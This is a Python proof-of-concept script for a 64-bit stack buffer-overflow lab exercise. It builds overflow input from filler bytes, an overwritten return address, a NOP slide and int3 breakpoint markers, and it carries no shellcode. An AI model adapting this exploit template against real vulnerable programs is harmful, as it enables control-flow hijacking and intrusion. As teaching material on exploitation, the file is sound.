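import struct
import sys

# Proof-of-concept input for a 64-bit stack buffer-overflow exercise.
#
# The original was a Python 2 only flat script (``print`` statement, ``str``
# payload, native-order ``struct.pack("Q", ...)``).  This version keeps the
# same output bytes but:
#   * builds the payload as ``bytes`` so it runs unchanged on Python 2.6+ and 3;
#   * packs the address with an explicit little-endian format, which the
#     x86-64 target requires regardless of the host running this script;
#   * exposes the magic numbers as parameters of ``build_payload`` so the
#     same code serves a different frame size or address;
#   * drops the alternative payloads that were only present as commented-out
#     code (dead code).

# 64 bytes for the character array plus 8 further bytes so the next 8 bytes
# written overwrite the saved return address (72 total, as in the original;
# the original comment's "1 byte" did not match its own constant).
PAD_LEN = 72
# Value written over the saved return address, i.e. where execution resumes
# after RET.  A fixed stack address like this only works while the target's
# stack layout is identical from run to run — confirm for the lab target.
RET_ADDR = 0x00007FFFFFFFDC20
# The original had a 100-byte NOP slide ("\x90" * 100) commented out and used
# an empty one; 0 reproduces that.
NOP_COUNT = 0
# Number of int3 (0xCC) bytes used as the marker at the end of the payload.
INT3_COUNT = 8


def build_payload(pad_len=PAD_LEN, ret_addr=RET_ADDR, nop_count=NOP_COUNT):
    """Return the overflow input as bytes: filler, return address, NOP slide, int3 marker.

    Args:
        pad_len: number of NUL filler bytes placed before the return address.
        ret_addr: 64-bit value packed little-endian over the saved return address.
        nop_count: number of 0x90 bytes between the address and the marker
            (0 in the original, where the slide was commented out).

    Returns:
        The concatenated payload as ``bytes``.

    Raises:
        struct.error: if ``ret_addr`` does not fit in an unsigned 64-bit field.
    """
    padding = b"\x00" * pad_len
    # "<Q": 8-byte unsigned, little-endian.  The original "Q" used the host's
    # byte order, which is only correct when host and target agree.
    eip = struct.pack("<Q", ret_addr)
    nopslide = b"\x90" * nop_count
    # int3 breakpoints rather than code: reaching them shows that the return
    # address was controlled, and the debugger stops there instead of the
    # program continuing into arbitrary memory.
    marker = b"\xCC" * INT3_COUNT
    return padding + eip + nopslide + marker


def main():
    """Write the payload plus a trailing newline to stdout, as the Python 2 ``print`` did."""
    # Python 3 text stdout rejects bytes; write to the underlying binary
    # buffer there, and to sys.stdout itself on Python 2 (no .buffer).
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(build_payload() + b"\n")
    out.flush()


if __name__ == "__main__":
    main()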